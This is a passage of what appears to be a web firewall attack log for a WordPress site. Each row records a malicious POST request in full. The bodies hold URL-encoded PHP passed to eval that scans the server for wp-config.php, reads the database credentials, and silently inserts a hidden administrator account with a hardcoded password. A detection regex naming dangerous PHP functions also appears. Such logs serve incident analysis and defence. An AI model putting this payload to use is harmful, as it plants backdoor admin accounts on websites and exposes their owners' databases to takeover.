%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));","POST \/wp-includes\/html-api\/class-wp-html-token.php HTTP\/1.1\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\ncontent-length:12663\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nsec-fetch-site:none\nsec-ch-ua:\"Chromium\";v=\"104\", \" Not A;Brand\";v=\"99\", \"Google Chrome\";v=\"104\"\ncontent-type:application\/x-www-form-urlencoded\nsec-fetch-mode:navigate\nsec-ch-ua-mobile:?0\nsec-fetch-dest:document\nsec-ch-ua-platform:\"Windows\"\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/104.0.0.0 Safari\/537.36\nhost:dewenlabels.com\nsec-fetch-user:?1\n\netswnK=eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));"]
["2026-05-16 18:08:22","213.209.159.254","POST","\/wp-includes\/Text\/hvsmdki\/1qjzitp\/hbmzirl\/function.debug.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/119.0.0.0 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> VM:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/wp-includes\/Text\/hvsmdki\/1qjzitp\/hbmzirl\/function.debug.php HTTP\/1.1\ncontent-length:12640\nsec-ch-ua:\"Google Chrome\";v=\"119\", \"Chromium\";v=\"119\", \"Not?A_Brand\";v=\"24\"\ncookie:4=1e9e32e066be8d516ba04b54073ce441; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvIx0vKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYaWypKIyp3DvB2yzXTMcoTIspUI0K2AioaEyoaEmXPEjYPEwXFy7nJ5woUIxMFNxpQgNqJ5fnJ5eXPEjXGgyrTy0B319sJEcMFtvVJ5iqUqlqTWfVFVcBj==; 1=53; 0=71\nsec-ch-ua-mobile:?0\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/119.0.0.0 Safari\/537.36\nsec-ch-ua-platform:\"macOS\"\ncontent-type:application\/x-www-form-urlencoded\nsec-fetch-site:none\nsec-fetch-mode:navigate\nsec-fetch-user:?1\nsec-fetch-dest:document\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\n\nVM=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%